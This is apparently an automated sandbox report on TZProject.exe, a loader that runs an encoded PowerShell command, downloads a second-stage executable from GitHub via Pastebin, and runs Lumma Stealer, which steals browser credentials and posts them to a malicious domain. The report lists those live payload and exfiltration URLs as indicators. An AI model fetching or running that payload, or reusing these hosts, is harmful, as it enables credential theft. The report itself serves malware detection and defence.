File name: TZProject.exe

Full analysis: https://app.any.run/tasks/af84fa24-7ff2-4276-8b6c-6b1b3dc0fadd
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 14, 2025, 14:16:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
pastebin
github
lumma
stealer
exfiltration
loader
netreactor
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5: F111DFEE984789E3F1BC348F761F0299
SHA1: 14C81BB485D366960DBA752123AA688B9DBC9395
SHA256: 7F8DA99A109BBB8863F0DEFAFBEA8160FB21457C2CB977881E577323907D1A36
SSDEEP: 768:2qqeJWZdFE2ECEL8JRLg23zrNKu8s9punqfaSYxnoXbOfC11kFQ5eg:Sg2ECELcLBzRK5s9puBfabO/FQ7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4708)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4708)
    • Executing a file with an untrusted certificate

      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)
    • Steals credentials from Web Browsers

      • nb5tyoim.yrl0.exe (PID: 6016)
    • Actions looks like stealing of personal data

      • nb5tyoim.yrl0.exe (PID: 6016)
    • LUMMA has been detected (YARA)

      • nb5tyoim.yrl0.exe (PID: 6016)
    • LUMMA has been detected (SURICATA)

      • nb5tyoim.yrl0.exe (PID: 6016)
    • LUMMA mutex has been found

      • nb5tyoim.yrl0.exe (PID: 6016)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • TZProject.exe (PID: 2232)
    • Starts POWERSHELL.EXE for commands execution

      • TZProject.exe (PID: 2232)
      • powershell.exe (PID: 4708)
    • Checks Windows Trust Settings

      • TZProject.exe (PID: 2232)
    • Base64-obfuscated command line is found

      • TZProject.exe (PID: 2232)
    • BASE64 encoded PowerShell command has been detected

      • TZProject.exe (PID: 2232)
    • Application launched itself

      • powershell.exe (PID: 4708)
      • nb5tyoim.yrl0.exe (PID: 5968)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4708)
    • Executes application which crashes

      • nb5tyoim.yrl0.exe (PID: 5968)
    • There is functionality for taking screenshot (YARA)

      • nb5tyoim.yrl0.exe (PID: 6016)
    • Searches for installed software

      • nb5tyoim.yrl0.exe (PID: 6016)
  • INFO

    • Create files in a temporary directory

      • TZProject.exe (PID: 2232)
    • Reads Environment values

      • TZProject.exe (PID: 2232)
    • Reads the machine GUID from the registry

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 6016)
    • Reads the computer name

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)
    • Checks supported languages

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4708)
    • Found Base64 encoded file access via PowerShell (YARA)

      • TZProject.exe (PID: 2232)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • TZProject.exe (PID: 2232)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • TZProject.exe (PID: 2232)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • TZProject.exe (PID: 2232)
    • Disables trace logs

      • powershell.exe (PID: 4708)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4708)
    • Checks proxy server information

      • powershell.exe (PID: 4708)
      • WerFault.exe (PID: 6060)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4708)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4708)
    • The executable file from the user directory is run by the Powershell process

      • nb5tyoim.yrl0.exe (PID: 5968)
    • .NET Reactor protector has been detected

      • nb5tyoim.yrl0.exe (PID: 6016)
    • Reads the software policy settings

      • nb5tyoim.yrl0.exe (PID: 6016)
      • WerFault.exe (PID: 6060)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 6060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (55.8)
.exe | Win64 Executable (generic) (21)
.scr | Windows screen saver (9.9)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:02:07 17:23:10+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 33792
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0xa25e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 0.0.0.0
InternalName: script.exe
LegalCopyright:
OriginalFileName: script.exe
ProductVersion: 0.0.0.0
AssemblyVersion: 0.0.0.0
No data.
All screenshots are available in the full report
Total processes: 122
Monitored processes: 9
Malicious processes: 4
Suspicious processes: 0

Behavior graph

start, tzproject.exe (no specs), conhost.exe (no specs), powershell.exe, powershell.exe (no specs), conhost.exe (no specs), nb5tyoim.yrl0.exe #LUMMA, nb5tyoim.yrl0.exe, werfault.exe, svchost.exe

Process information

Columns: PID | CMD | Path | Indicators | Parent process
PID: 1512 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent process: TZProject.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2192 | CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | Path: C:\Windows\System32\svchost.exe | Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2232 | CMD: "C:\Users\admin\Desktop\TZProject.exe" | Path: C:\Users\admin\Desktop\TZProject.exe | Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Description:
Exit code: 0
Version: 0.0.0.0
Modules
Images
c:\users\admin\desktop\tzproject.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 4548 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4708 | CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: TZProject.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
PID: 5400 | CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>; | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 5968 | CMD: "C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe" | Path: C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe | Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Description: Purpose
Exit code: 3221226505
Version: 1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\nb5tyoim.yrl0.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 6016 | CMD: "C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe" | Path: C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe | Parent process: nb5tyoim.yrl0.exe
User: admin
Integrity Level: MEDIUM
Description: Purpose
Exit code: 0
Version: 1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\nb5tyoim.yrl0.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\msvcp_win.dll
PID: 6060 | CMD: C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5968 -s 836 | Path: C:\Windows\SysWOW64\WerFault.exe | Parent process: nb5tyoim.yrl0.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Problem Reporting
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events: 21 095
Read events: 21 095
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 1
Suspicious files: 3
Text files: 7
Unknown types: 0

Dropped files

Columns: PID | Process | Filename | Type
PID: 6060 | Process: WerFault.exe | Filename: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nb5tyoim.yrl0.ex_1e4d6bd53c7ee7cb0c64f2577ea4aeb3c7865e9_fcd17f1d_c614fe75-025e-47c4-af12-01ee5610e4f8\Report.wer
MD5:
SHA256:
PID: 6060 | Process: WerFault.exe | Filename: C:\Users\admin\AppData\Local\CrashDumps\nb5tyoim.yrl0.exe.5968.dmp
MD5:
SHA256:
PID: 5400 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0uawmq1l.2uj.psm1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 2232 | Process: TZProject.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hulj1bnb.mhx.psm1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 5400 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | Type: binary
MD5: 1382C5528E377AED45D5574A0A2B6FF4
SHA256: BB87F6FCFF3AB527360406ACA5BDB98EAA6154BB6829FCD78C8FCBBCDC2F07C4
PID: 5400 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_higqe2gd.szp.ps1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 2232 | Process: TZProject.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kz0ulezh.xqc.ps1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 4708 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d3hcxifz.3mf.ps1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 4708 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ktcclyz.ram.psm1 | Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 6060 | Process: WerFault.exe | Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5C9.tmp.dmp | Type: binary
MD5: EA9821DCCCB4E9CEB39475B50C46B055
SHA256: 13BF7252D4A06E15F37D38823F1E9B36A33B40322F0FB22138898F3C62E9C0CB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 11
TCP/UDP connections: 29
DNS requests: 7
Threats: 18

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
Method: GET | HTTP code: 302 | IP: 140.82.121.3:443 | URL: https://github.com/trest1ah/hemma/raw/refs/heads/main/ssh.exe | CN: unknown
Method: GET | HTTP code: 200 | IP: 104.20.3.235:443 | URL: https://pastebin.com/raw/muDUueLN | CN: unknown | Type: text | Size: 61 b | Reputation: whitelisted
Method: GET | HTTP code: 200 | IP: 140.82.121.3:443 | URL: https://raw.githubusercontent.com/trest1ah/hemma/refs/heads/main/ssh.exe | CN: unknown | Type: executable | Size: 418 Kb | Reputation: whitelisted
Method: POST | HTTP code: 403 | IP: 104.21.89.34:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Reputation: malicious
Method: POST | HTTP code: 200 | IP: 104.21.89.34:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: text | Size: 18 b | Reputation: malicious
Method: POST | HTTP code: 200 | IP: 172.67.136.248:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: text | Size: 18 b | Reputation: malicious
Method: POST | HTTP code: 403 | IP: 104.21.89.34:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: html | Size: 4.44 Kb | Reputation: malicious
Method: POST | HTTP code: 200 | IP: 172.67.136.248:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: text | Size: 18 b | Reputation: malicious
Method: POST | HTTP code: 200 | IP: 172.67.136.248:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: text | Size: 18 b | Reputation: malicious
Method: POST | HTTP code: 200 | IP: 104.21.89.34:443 | URL: https://rehfreshingdrinks.cyou/api | CN: unknown | Type: text | Size: 18.3 Kb | Reputation: malicious

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation
IP: 20.73.194.208:443 | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: NL | Reputation: whitelisted
PID: 4 | Process: System | IP: 192.168.100.255:137 | Reputation: whitelisted
IP: 2.19.96.121:443 | ASN: Akamai International B.V. | CN: DE | Reputation: unknown
PID: 4 | Process: System | IP: 192.168.100.255:138 | Reputation: whitelisted
PID: 4708 | Process: powershell.exe | IP: 104.20.3.235:443 | Domain: pastebin.com | ASN: CLOUDFLARENET | Reputation: whitelisted
PID: 4708 | Process: powershell.exe | IP: 140.82.121.4:443 | Domain: github.com | ASN: GITHUB | CN: US | Reputation: whitelisted
PID: 4708 | Process: powershell.exe | IP: 185.199.109.133:443 | Domain: raw.githubusercontent.com | ASN: FASTLY | CN: US | Reputation: whitelisted
PID: 6016 | Process: nb5tyoim.yrl0.exe | IP: 104.21.89.34:443 | Domain: rehfreshingdrinks.cyou | ASN: CLOUDFLARENET | Reputation: malicious
PID: 6060 | Process: WerFault.exe | IP: 20.42.73.29:443 | Domain: watson.events.data.microsoft.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: US | Reputation: whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.206
whitelisted
pastebin.com
  • 104.20.3.235
  • 172.67.19.24
  • 104.20.4.235
whitelisted
github.com
  • 140.82.121.4
whitelisted
raw.githubusercontent.com
  • 185.199.109.133
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.110.133
whitelisted
rehfreshingdrinks.cyou
  • 104.21.89.34
  • 172.67.136.248
malicious
watson.events.data.microsoft.com
  • 20.42.73.29
whitelisted
self.events.data.microsoft.com
  • 51.104.15.253
whitelisted

Threats

Columns: PID | Process | Class | Message
PID: 2192 | Process: svchost.exe | Class: Not Suspicious Traffic | Message: INFO [ANY.RUN] Online Pastebin Text Storage
PID: 2192 | Process: svchost.exe | Class: Not Suspicious Traffic | Message: INFO [ANY.RUN] Attempting to access raw user content on GitHub
Class: Potentially Bad Traffic | Message: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Class: Potentially Bad Traffic | Message: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Class: Potential Corporate Privacy Violation | Message: ET INFO PE EXE or DLL Windows file download HTTP
Class: Potentially Bad Traffic | Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Class: Misc activity | Message: ET INFO Packed Executable Download
Class: Misc activity | Message: ET HUNTING EXE Downloaded from Github
PID: 6016 | Process: nb5tyoim.yrl0.exe | Class: A Network Trojan was detected | Message: STEALER [ANY.RUN] Lumma Stealer TLS Connection
Class: A Network Trojan was detected | Message: ET MALWARE Lumma Stealer Related Activity
No debug info